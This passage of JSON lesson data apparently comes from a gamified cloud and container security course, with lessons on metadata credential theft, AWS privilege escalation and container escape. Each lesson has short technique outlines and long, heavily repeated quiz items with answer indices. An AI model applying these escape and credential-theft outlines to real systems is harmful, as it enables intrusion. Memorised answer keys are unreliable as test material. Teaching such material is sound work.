fundamentals."},{"type":"code","lang":"bash","content":"RBAC, secrets, network policies, pod security, service accounts"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"K8s secrets are stored as...","opts":["Encrypted","Base64 encoded (not encrypted by default)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-metadata","cat":"Cloud & Container","title":"Cloud Metadata Exploitation","diff":2,"xp":150,"intro":"Steal IAM credentials from instance metadata.","sections":[{"type":"text","content":"Steal IAM credentials from instance metadata."},{"type":"code","lang":"bash","content":"169.254.169.254 exposes instance details and temporary credentials"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Metadata is at...","opts":["8.8.8.8","169.254.169.254","127.0.0.1","10.0.0.1"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-tf-scan","cat":"Cloud & Container","title":"Terraform Scanning","diff":1,"xp":75,"intro":"Catch misconfigs before deployment.","sections":[{"type":"text","content":"Catch misconfigs before deployment."},{"type":"code","lang":"bash","content":"tfsec, checkov scan IaC for public resources, missing encryption"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deployment","Before deployment (shift-left)","During runtime","Never"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-container-scan","cat":"Cloud & Container","title":"Container Image Scanning","diff":1,"xp":75,"intro":"Scan images for known vulnerabilities.","sections":[{"type":"text","content":"Scan images for known vulnerabilities."},{"type":"code","lang":"bash","content":"Trivy, Snyk, Grype check OS packages and dependencies"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Image scanning should happen...","opts":["After deployment","In the CI/CD pipeline before push","Monthly","Never"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-k8s-rbac","cat":"Cloud & Container","title":"K8s RBAC","diff":2,"xp":150,"intro":"Control who can do what in the cluster.","sections":[{"type":"text","content":"Control who can do what in the cluster."},{"type":"code","lang":"bash","content":"Roles, ClusterRoles, RoleBindings, ClusterRoleBindings"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"ClusterRole differs from Role by...","opts":["Being more secure","Applying cluster-wide not just one namespace","Requiring admin","Different syntax"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-k8s-netpol","cat":"Cloud & Container","title":"K8s Network Policies","diff":2,"xp":150,"intro":"Restrict pod-to-pod communication.","sections":[{"type":"text","content":"Restrict pod-to-pod communication."},{"type":"code","lang":"bash","content":"Default allow-all. Network policies implement microsegmentation"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Without NetworkPolicies, pods...","opts":["Are isolated","Can all communicate with each other","Need explicit allow","Are restricted by namespace"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-aws-privesc","cat":"Cloud & Container","title":"AWS Privilege Escalation","diff":3,"xp":200,"intro":"Escalate from low-priv IAM to admin.","sections":[{"type":"text","content":"Escalate from low-priv IAM to admin."},{"type":"code","lang":"bash","content":"Create keys, assume roles, attach policies, create Lambda with elevated role"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS privesc exploits...","opts":["Network ACLs","Overpermissive IAM policies","S3 encryption","CloudFront"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-container-escape2","cat":"Cloud & Container","title":"Container Escape Techniques","diff":3,"xp":200,"intro":"Break out to the host.","sections":[{"type":"text","content":"Break out to the host."},{"type":"code","lang":"bash","content":"Docker socket, --privileged, kernel vulns, writable cgroup"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Easiest container escape vector...","opts":["Kernel exploit","Mounted Docker socket with --privileged","DNS tunneling","Port scanning"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cl-forensics","cat":"Cloud & Container","title":"Cloud Forensics","diff":3,"xp":200,"intro":"Investigate incidents in cloud environments.","sections":[{"type":"text","content":"Investigate incidents in cloud environments."},{"type":"code","lang":"bash","content":"CloudTrail logs, snapshots, flow logs replace traditional disk forensics"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Cloud forensics uses...","opts":["Disk imaging","API logs, snapshots, and flow logs","Memory dumps only","Network captures only"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load 